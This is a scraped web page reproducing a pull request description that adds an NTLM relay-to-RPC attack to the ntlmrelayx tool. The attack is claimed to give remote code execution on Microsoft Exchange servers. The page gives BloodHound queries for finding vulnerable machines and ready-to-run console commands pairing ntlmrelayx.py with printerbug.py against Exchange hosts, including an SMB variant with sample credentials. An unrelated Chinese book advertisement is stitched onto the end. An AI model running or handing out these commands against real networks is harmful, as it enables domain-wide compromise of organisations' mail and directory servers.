内容简介:Hello there,This PR implements Relaying to RPC attack which currently allowsUsage
Hello there,
This PR implements Relaying to RPC attack which currently allows RCE in any MS Exchange via Exchange Trusted Subsystem group (All exchange systems have Administrator rights to each other via this or similar group) and printerbug.py.
BloodHound queries to find vulnerable machines
MATCH p=(a:Computer)-[r1:MemberOf*1..]->(g:Group)-[r2:AdminTo]->(b:Computer) RETURN p MATCH p=(a:Computer)-[r:AdminTo]->(b:Computer) RETURN p
Relaying to ncacn_ip_tcp:
# Console 1 sudo python2 ntlmrelayx.py -debug -c whoami -t rpc://EXCHANGE1-ADDR # Console 2 python2 ./printerbug.py test@EXCHANGE2-ADDR {your_ip}
Relaying to IPC$
(low-privileged account needed), but requires only 445/tcp, and the connection will be encrypted:
# Console 1 sudo python2 ntlmrelayx.py -c whoami -t rpc://EXCHANGE1-ADDR -rpc-use-smb -auth-smb 'CONTOSO/test:P@ssw0rd' # Console 2 python2 ./printerbug.py test@EXCHANGE2-ADDR {your_ip}
My original complete patch: https://gist.github.com/mohemiv/ab542e4ff5d8fedda790e35326705bad
MD5SUM from May 2, 2020: https://twitter.com/_mohemiv/status/1256636651780087809
The supported functions:
Also I've tested relaying connections to MMC20 object, but relaying to DCOM will gave you only the relayed user permissions, in my PoC it required 2 connections from the target, and there is no way to launch a DCOM object via only 445/tcp. So, the full PoC for DCOM has not been developed. Relaying to WMI is not possible as WMI requires signing.
As you already know, Compass Security company has already published the description of this attack ( https://twitter.com/compasssecurity/status/1260898906629529602 ), but as I know from MS, the patch is not fully developed yet. May be it because of IPC$ and MMC20 examples I sent via MSRC.
For @CompassSecurity
, it will be interesting to see your RPC Server and ways to get an incoming RPC connection
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
胡晨川 / 电子工业出版社 / 2017-4 / 55
《数据化运营速成手册》用于提升互联网公司员工的数据应用能力,即数据化运营能力。首先,从最常用的数据图表切入,帮助执行层正确地绘图,管理层正确地看图;接着,梳理运营中最基本的数据应用知识,涉及数据获取、数据清洗、数据认知、分析框架、指标体系、运营实验等内容。然后,介绍作者认为必要的统计学知识,包括假设检验、方差分析、回归分析和时间序列分解,并引入了管理科学中的规划求解方法。最后,介绍了数据分析工具的......一起来看看 《数据化运营速成手册》 这本书的介绍吧!